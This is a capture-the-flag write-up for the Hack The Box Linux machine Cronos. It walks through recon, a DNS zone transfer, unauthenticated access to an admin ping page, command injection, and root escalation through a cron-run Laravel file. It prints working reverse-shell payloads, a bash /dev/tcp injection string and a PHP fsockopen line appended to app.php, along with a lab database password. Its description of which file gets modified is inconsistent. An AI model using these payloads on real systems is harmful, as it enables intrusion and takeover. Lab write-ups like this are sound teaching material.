
Cronos Writeup

  • 241216: Added missing title to block, which was previously omitted due to oversight.

Super easy. Would you believe the difficulty is rated Medium?

Machine Info

Machine      Description
Name         Cronos
OS           Linux
Difficulty   Medium
Author       ch4p

Recon

Service scan

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p- --min-rate 6969 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:02 EST
Nmap scan report for 10.129.239.126
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p22,53,80 -sCV 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:04 EST
Nmap scan report for 10.129.239.126
Host is up (0.058s latency).

PORT   STATE  SERVICE   VERSION
22/tcp open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open   domain    ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds

The scan shows three open ports: SSH, DNS and HTTP. DNS being open is interesting; we will play with it shortly.

HTTP - Port 80

Before browsing to the site, check whether the response headers reveal the machine's domain name.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -sv -o /dev/null 10.129.239.126
*   Trying 10.129.239.126:80...
* Connected to 10.129.239.126 (10.129.239.126) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.239.126
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2024 02:10:05 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
< ETag: "2caf-5b7cbd6fbb19d"
< Accept-Ranges: bytes
< Content-Length: 11439
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [11439 bytes data]
* Connection #0 to host 10.129.239.126 left intact

They do not. We only learn what the nmap scan already told us: the site is hosted on Apache.

Browsing to the site shows the default page of Apache on Ubuntu. Seeing this page usually means one of two things: either the site is misconfigured, or we are not using the right route (virtual host), so Apache does not know where to send us.

So let's find the domain name first!

DNS - Port 53

The DNS service was already spotted during the scan, so try a reverse lookup with dig -x.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig @10.129.239.126 -x 10.129.239.126

; <<>> DiG 9.20.2-1-Debian <<>> @10.129.239.126 -x 10.129.239.126
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17915
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;126.239.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
126.239.129.10.in-addr.arpa. 604800 IN  PTR     ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.    604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 56 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (UDP)
;; WHEN: Tue Nov 19 21:24:58 EST 2024
;; MSG SIZE  rcvd: 114

The reverse lookup of the IP gives the domain cronos.htb! Beyond that, we can also try a zone transfer (AXFR)!

What is a zone transfer? How did we know to try one?

Didn't it seem odd that nmap found DNS listening on 53/TCP?
Ordinarily DNS queries only need 53/UDP. TCP is enabled here for the zone transfer feature, because the UDP packet size limit is too small to carry the data unless it is under 512 bytes.
For details, see this explanation of zone transfers and the AXFR example.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig axfr @10.129.239.126 cronos.htb

; <<>> DiG 9.20.2-1-Debian <<>> axfr @10.129.239.126 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (TCP)
;; WHEN: Tue Nov 19 21:17:04 EST 2024
;; XFR size: 7 records (messages 1, bytes 203

This reveals a subdomain, admin, so add both names to /etc/hosts.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ echo "10.129.239.126 cronos.htb admin.cronos.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.129.239.126 cronos.htb admin.cronos.htb

cronos.htb

Visiting the cronos.htb home page and viewing its source, every link on the page points to Laravel. Laravel is a well-known PHP framework, so the backend is presumably PHP.

Other things done in this phase

Nothing of interest.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cronos.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       85l      137w     2319c http://cronos.htb/
404      GET        9l       33w      287c http://cronos.htb/Program%20Files
301      GET        9l       28w      306c http://cronos.htb/css => http://cronos.htb/css/
200      GET        9l     1270w   118393c http://cronos.htb/css/app.css
200      GET        0l        0w        0c http://cronos.htb/favicon.ico
200      GET       85l      137w     2319c http://cronos.htb/index.php
301      GET        9l       28w      305c http://cronos.htb/js => http://cronos.htb/js/
200      GET       41l     5569w   284534c http://cronos.htb/js/app.js
200      GET        2l        3w       24c http://cronos.htb/robots.txt
200      GET       23l       59w      914c http://cronos.htb/web.config
[####################] - 10s     4742/4742    0s      found:10      errors:0
[####################] - 9s      4735/4735    507/s   http://cronos.htb/
[####################] - 1s      4735/4735    9230/s  http://cronos.htb/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 1s      4735/4735    4735/s  http://cronos.htb/js/ => Directory listing (add --scan-dir-listings to scan)
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -s http://cronos.htb/web.config
<configuration>
<system.webServer>
  <rewrite>
    <rules>
      <rule name="Imported Rule 1" stopProcessing="true">
        <match url="^(.*)/$" ignoreCase="false" />
        <conditions>
          <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
        </conditions>
        <action type="Redirect" redirectType="Permanent" url="/{R:1}" />
      </rule>
      <rule name="Imported Rule 2" stopProcessing="true">
        <match url="^" ignoreCase="false" />
        <conditions>
          <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
          <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
        </conditions>
        <action type="Rewrite" url="index.php" />
      </rule>
    </rules>
  </rewrite>
</system.webServer>
</configuration>

Broken access control

admin.cronos.htb is a login page that requires a username and password. Brute-forcing the password did not succeed, so I brute-forced the directory listing specifically for files with a .php extension.

The scan results show that any user can fetch welcome.php without logging in (the 302 to index.php still returns a 439-byte body).

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://admin.cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -x php
...
302      GET        0l        0w        0c http://admin.cronos.htb/logout.php => index.php
200      GET       56l      139w     1547c http://admin.cronos.htb/
200      GET        0l        0w        0c http://admin.cronos.htb/config.php
200      GET       56l      139w     1547c http://admin.cronos.htb/index.php
302      GET       20l       38w      439c http://admin.cronos.htb/welcome.php => index.php
302      GET        0l        0w        0c http://admin.cronos.htb/session.php => index.php
404      GET        9l       33w      293c http://admin.cronos.htb/Style%20Library
404      GET        9l       33w      297c http://admin.cronos.htb/Style%20Library.php
404      GET        9l       33w      290c http://admin.cronos.htb/modern%20mom
404      GET        9l       34w      295c http://admin.cronos.htb/neuf%20giga%20photo
404      GET        9l       33w      294c http://admin.cronos.htb/modern%20mom.php
404      GET        9l       34w      299c http://admin.cronos.htb/neuf%20giga%20photo.php

The admin site does not manage permissions properly, so anyone who knows about admin.cronos.htb/welcome.php can use the traceping feature.
I opened Burp Suite, captured the requests while testing the features, and found that only the ping function works properly.

Finding command injection

The captured request shows that welcome.php contains nothing more than a simple function that sends a command.

Both parameters, command=<COMMAND> and host=<IP>, can be changed freely, so I tried injecting a curl command that calls back to my machine, and the web server did indeed send the GET request.

Prepare the reverse shell payload:

command=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.10%2f8787%200%3e%261%20%23'&host=8.8.8.8
Command injection payload explained

URL-decoding the payload gives:

command=bash -c 'bash -i >& /dev/tcp/10.10.14.10/8787 0>&1 #'&host=8.8.8.8
It is just a simple reverse shell command, with a # appended to comment out the IP that follows.
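As an added defensive example (not code from this writeup or from the Cronos machine, whose welcome.php source is not shown), here is how a ping helper like welcome.php can validate both parameters so that neither reaches the shell unchecked. The binary paths, the flags and the $_SESSION['loggedin'] check are assumptions.

```php
<?php
// Added example, not the Cronos machine's welcome.php (its source is not
// shown in the writeup); the vulnerable shape below is an assumption.
//
// Assumed vulnerable pattern: both POST parameters are joined into one
// shell string, so "command" and "host" are attacker-controlled:
//   $out = shell_exec($_POST['command'] . ' ' . $_POST['host']);
//
// Hardened version: the command comes from a fixed allowlist, the host
// must parse as an IP address, and every argument is escaped anyway.

// User-visible choices mapped to full binary paths with fixed flags.
const ALLOWED_COMMANDS = [
    'ping'       => ['/bin/ping', '-c', '4'],
    'traceroute' => ['/usr/sbin/traceroute', '-m', '15'],
];

function run_net_tool(string $command, string $host): string
{
    if (!array_key_exists($command, ALLOWED_COMMANDS)) {
        throw new InvalidArgumentException('unknown command');
    }
    // Only a literal IPv4/IPv6 address passes; hostnames and anything
    // containing shell metacharacters (";", "$(", "#") are rejected here.
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('host must be an IP address');
    }
    // argv is built from fixed parts plus the one validated user value.
    $argv = array_map('escapeshellarg', ALLOWED_COMMANDS[$command]);
    $argv[] = escapeshellarg($host);
    $output = shell_exec(implode(' ', $argv) . ' 2>&1');
    return is_string($output) ? $output : '';
}

// Handler: require a login first (assumed $_SESSION['loggedin'] flag;
// the writeup's welcome.php answered without one), then run the tool.
session_start();
if (empty($_SESSION['loggedin'])) {
    header('Location: index.php');
    exit; // without exit the page body is still sent after the redirect
}
try {
    $result = run_net_tool($_POST['command'] ?? '', $_POST['host'] ?? '');
    echo '<pre>' . htmlspecialchars($result) . '</pre>';
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo htmlspecialchars($e->getMessage());
}
```

The exit after header() matters: the writeup's scan shows welcome.php answering 302 with a full body, which is exactly what a redirect without exit produces.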

Reverse shell obtained!

Unexpectedly, www-data has permission to read noulis's home directory.

Terminal
www-data@cronos:/var/www/admin$ ls
ls
config.php
index.php
logout.php
session.php
welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K May 10  2022 .
drwxr-xr-x 23 root   root   4.0K May 10  2022 ..
drwxr-xr-x  4 noulis noulis 4.0K May 10  2022 noulis
www-data@cronos:/home$ ls noulis
ls noulis
user.txt
www-data@cronos:/home$ cat noulis/user.txt
cat noulis/user.txt
e37184fa832a858d65f55f9c0ff03205

Other things done in this phase

Unsuccessful.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ ffuf -request-proto http -request login.req -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt -fs 1585
...

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://admin.cronos.htb
Connection: keep-alive
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=aoisqv2k4egh3llbkgvqgj13q1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=FUZZ

Privilege escalation via crontab

The machine's name is too big a hint, and on top of that www-data can read /etc/crontab. Ha, how could we not take a look?

Terminal
www-data@cronos:/$  cat /etc/crontab
 cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Sure enough, there is something there: root runs Laravel's artisan schedule:run every minute. That means if we can manipulate artisan, or a service that artisan brings up, we can escalate privileges!

Terminal
www-data@cronos:/$ ls -alh /var/www/laravel/artisan
ls -alh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1.7K Apr  9  2017 /var/www/laravel/artisan

First check the permissions on /var/www/laravel/artisan: it turns out to be readable and writable, and reading it shows that artisan is just a PHP file. In theory we only need to append a PHP reverse shell to that file and wait for a root reverse shell to come back. But the current session is a dumb shell, so I cannot edit the file interactively with vim, and I want to simply tee -a the code in, so first let's see which file is suitable for appending code on its last line.

If you want, you can use python to make the dumb shell "smart".

artisan first includes two files, autoload.php and app.php, and ends with exit($status), so appending code to the end of artisan will not work. Let's look at the other two files instead.

www-data@cronos:/$ cat /var/www/laravel/artisan
cat /var/www/laravel/artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';
...
$kernel->terminate($input, $status);

exit($status);
www-data@cronos:/var/www/laravel$ cat bootstrap/*.php
cat bootstrap/*.php
<?php

...

$app->singleton(
    Illuminate\Contracts\Http\Kernel::class,
    App\Http\Kernel::class
);

$app->singleton(
    Illuminate\Contracts\Console\Kernel::class,
    App\Console\Kernel::class
);

$app->singleton(
    Illuminate\Contracts\Debug\ExceptionHandler::class,
    App\Exceptions\Handler::class
);
...
return $app;

Not suitable for appending code at the end, because of the return.

<?php

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Composer Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/../vendor/autoload.php';

Finally, add the payload to autoload.php and wait for the callback.

'$sock=fsockopen("10.10.14.10",8788);exec("/bin/bash -i <&3 >&3 2>&3");'
Terminal
www-data@cronos:/var/www/laravel$ echo '$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
<c("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");
www-data@cronos:/var/www/laravel$ exit  
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ nc -lvnp 8788
listening on [any] 8788 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.239.126] 47986
bash: cannot set terminal process group (10151): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# cat root.txt
cat root.txt
0e2da2d811079c6307c50a835b593f87

Last update: 2024-12-23 Created: 2024-11-27